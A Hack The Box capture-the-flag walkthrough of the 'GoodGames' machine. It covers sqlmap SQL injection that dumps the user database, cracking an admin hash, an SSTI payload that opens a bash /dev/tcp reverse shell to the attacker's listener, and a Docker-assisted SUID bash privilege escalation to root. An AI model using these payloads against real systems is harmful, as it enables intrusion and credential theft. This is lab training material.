GoodGames is Linux machine
and considered as easy box by the hack the box, but it was tricky indeed. On
this box we will begin with basic port scan and move laterally. Then we will
enumerate domain name and subdomains. Then we will exploit SQL Injection
vulnerability using burp and SQLmap. Exploitation of the server-side template
injection (SSTI) will give us initial foothold to the target machine. Then we
will be tasked to gain root access where we will exploit it by taking advantage
of the special permissions and ownerships both in server and the Docker. A
successful binary abuse will give us a root shell into the target system.
Table of content
Initial Access
- TCP Port Scan
- Initial Enumeration
- Web Page Enumeration
- SQL Injection Exploitation with sqlmap
- Admin Console Enumeration
- Internal Sub Domain Enumeration
- Server-Side Template Injection (SSTI) Exploitation
- User Flag
Privilege Escalation
- Docker Enumeration
- SUID Permission abuse
- Root Flag
Let’s exploit it step by step.
We are going to start assessment with the normal
TCP/IP port scanning.
TCP Port Scan
Let’s start with the port scan. We are using nmap
to find out which ports are open and what services are running in the target
host. Nmap is a popular port scanning tool come with Kali Linux. In order to
perform port scan, we have used -sV and -sC flags which performs
a service version scan with NSE scripts against the target machine.
: Attempts to determine the
service version
: Scans with default NSE scripts
nmap -sV -sC
From the nmap scan, we have
found there were only one port is open, which is port 80. As usual HTTP
service is running on its default port and the HTTP service is used for the
webhosting. Let’s take some notes about our findings.
Initial Enumeration
As we have
only one port is open, we begin with port 80 enumerating by accessing it over
browser and found web page. From the webpage interface, it is look like video
game online store. If we see our nmap result, we gathered earlier showing the
http title as Goodgame community and store that makes sense.
Web Page Enumeration
Before registering a new user account lets capture the log in request on
burp. Here we are using a random email and password. You can use any random
credentials to capture request for the testing purpose.
We are capturing login request on burp to check if there is any SQL
injection vulnerability present in the target system. We captured the request
and saved as sqlfile. The reason
we are checking SQL injection vulnerability as there is a login page and it is
worth checking SQL injection in login pages and on any user input field. Most
of the time, SQL injection vulnerabilities found in user input fields in the
web application.
SQL Injection Exploitation
with sqlmap
Next, we are going to check
the database name by loading the login request that we captured on burp. In the
below picture, we have loaded sqlfile on sqlmap which will going to find
out the database name if the web application login parameter is vulnerable to
the SQL injection. Full function of the flags are given below.
sqlmap -r sqlfile –dbs
--dbs : Enumerate DBMS databases
--batch: Never ask
for user input, use the default behaviour
-r : Request
Once we
get the database name then we will dump all the contents that database is
containing by issuing request file, database name.
sqlmap -r sqlfile -D main
–dbs --batch
--dump-all : Dump all
-D: Database name
--batch: Never ask
for user input, use the default behaviour
-r: Request
dumping all the contents from the main database, we have found username,
email and password hash. Here we are going to keep a note of dumped
It is look like md5 hash but what can we do with this hash? Until we
have a plain texted password, we cannot proceed further. So, we simply copy
full hash and pasted on google gave us a plain texted password of md5hash. What
else we could do if we did not get plain texted password from google? Then we
can use crackstation website to crack hash or hashcat and john tools to crack
the hash offline.
Password: superadministrator
Admin Console Enumeration
As we have admin user password in plain
texted form, we can try log in as admin user in the web console for the further
After logging in, we tried enumerating administrator account but
unfortunately, we did not get anything interesting there. There was same
information that we already have but nothing much more.
Then we
decided to check source code of the admin profile page and found a new
subdomain there. It is worth checking source code as many times we may get
valuable information from there such as subdomain or any secrets from the
comment etc.
url: http://internal-administration.goodgames.htb
Let’s add
it to /etc/hosts file in the attacking machine.
Why we need to add domain in the local hosts file?
The /etc/hosts file contains a
mapping of IP addresses to URLs. Your browser uses entries in the /etc/hosts
file to override the IP-address-to-URL mapping returned by a DNS server. This
is useful for testing DNS (domain name system) changes and the SSL
configuration before making a website live.
Internal Sub Domain
adding internal sub-domain to the hosts file, we accessed it over browser where
we have seen a new web page with login page. We used the same credentials that
we used earlier to Flask Volt sign in system.
Server-Side Template
Injection (SSTI) Exploitation
From the information
we gathered during nmap scan that server-side code was python, so it is worth
checking the Server-side template injection (SSTI). Here we are using a payload
to detect SSTI, and the detection process is like the XXS. We have found that
user input field is vulnerable to SSTI as it is reflecting the sum of the
payload provided.
What is SSTI vulnerability?
A server-side
template injection (SSTI) vulnerability occurs when user data is
embedded directly in a template and then interpreted by the template engine.
This allows attackers to inject arbitrary directives to manipulate the template
payload: {{5*5}}
Now it is
confirmed that target system is vulnerable to the SSTI, now we are in the
position to move forward to inject a reverse shell payload. For the reverse
shell we are using a popular git repository “Payload All The Things”
where you will find all the payloads you will need during your penetration
testing engagement. Please note, we will need to modify payload to receive
reverse shell. For example, we need to issue our attacking machine IP address ( and port number (1234) where we wish
to listen.
Original payload: {{ namespace.__init__.__globals__.os.popen('id').read() }}
payload: {{
namespace.__init__.__globals__.os.popen('bash -c "bash -i >&
/dev/tcp/ 0>&1"').read() }}
When our
payload is crafted then we will inject it into the user input field which is
“Full Name” in the target web
application then we will start a netcat listener in our attacking machine with
below command.
nc -lvp
User flag
Next, we
will execute it by clicking on Save all tab which will execute our
malicious payload in the target system and send a remote connection back to our
netcat listener. In the below screenshot, we can see that we have successfully
received a reverse connection as user root. But there is a trick, it is
not the real root shell which we will discuss later. Once, we get reverse
connection then we can grab user flag from the /home/augustus directory.
Privilege Escalation:
Docker Enumeration
enumerating for the privilege escalation vectors, we found a Docker file
present in the root backend directory (/backend) which give an insight that
sever is using docker container in it. Let’s talk docker role in the box or in
any server. Please note, that we are in the docker container not in the real
We checked the network interface and
found it is connected to the internal network adaptor on
subnet that means we cannot communicate with the internal network directly from
our kali system, but the compromised host can communicate with the internal
network. In this scenario we can use port forwarding or pivoting technique to
communicate directly from our kali system but before jumping into that we also
need to verify which hosts are up in the internal network. To find out the
available host in the internal network we are going to use nmap static binary
which means a portable nmap binary that we can use from the compromise hosts
system against the internal network. We can download nmap static binary from
below link by providing following command:
Then we
will transfer this binary to the compromised host using python server by
issuing following command from our kali system:
python3 -m
http.server 80
server is on then we can download nmap binary from kali by issuing following
command from the compromised host:
note we have used kali IP address as we are transferring binary from
Next, we
will give full permission to the binary so we can execute it against the
internal network in order to find live hosts. For more information about Linux
file permissions.
Here we
have provided -sn flag which will only show number of available hosts in
the subnet and their IP addresses. From the nmap scan result we found that is up.
Once we
found the potential target host from the internal network. We decided to
enumerate further against it. Next, we will run another nmap scan against the potential
target host ( verbosely with -v flag to get more information
about the target system. Here is the command to reproduce the prove of concept
./nmap -v
From the
nmap scan we found that 2 ports are open where 22 port is running SSH service
and port 80 is running HTTP service.
SetUID Permission Abuse
Now we are
trying to log in to the server as augustus from the docker container using same
password we cracked from the md5 hash earlier. Then we copied /bin/bash binary
to augustus home directory which will be available in the docker as well. Next,
we will exit the shell and go back to docker root shell where we have privilege
to set SUID to bash binary as root. There we will change the ownership
of the bash binary where we have given root user ownership. Next, we will
change the permission and give augustus full permission on bash binary.
Why are we doing it and what’s the story?
As we know we got a root shell on docker, we cannot get root flag from
the docker as it is not present there because it is just a container which is
used for the web hosting. And we have access on server as user augustus who is
a low privileged user, so he has limited permissions on the server and the goal
is to gain root shell on the server.
Here augustus can download or copy bash binary on his home directory in
the server but he cannot change ownership because of limited permission as low
privileged user. On the other hand, from the root docker shell we have root
permission who can change ownership but no bash binary present in the docker
that’s why we copied bash binary as augustus on his home directory then
switched to docker root shell so we can change ownership of the binary. Once we
change ownership then it will consider that bash binary is owned by root and if
anyone execute it then it will spawn a bash root shell which is our goal to
Only changing ownership will not work until we give execute permission
to augustus. If he can execute it, then a root shell will be spawned so that’s
why at the last step we are also issuing full permission to augustus on that binary.
Steps to reproduce the POC:
upgrade to interactive shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Copy bash binary to augustus home directory:
cp /bin/bash .
Change Ownership of the binary:
chown root:root bash
Give full permission:
chmod 4777 bash
Root Flag
Then we
again switched to augustus shell and navigate to bash SUID set binary which is
available on augustus home directory. Execution of the SUID binary spawned a
bash root shell. Now we can grab our root flag from /root/root/ directory. Here
are the steps to reproduce the POC.
./bash -p
This machine was
fun and was great source of learning, where we have learned and explored so
many things such as TCP port scan, service enumeration, SQL injection
vulnerability Enumeration using burp suite, Exploitation of SQL injection with SQLmap,
Server-Side Template Injection vulnerability enumeration and exploitation, file
transfer, file permissions, about nmap static binary, internal network, Docker,
Set UID permissions on docker to perform local privilege escalation.
Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!
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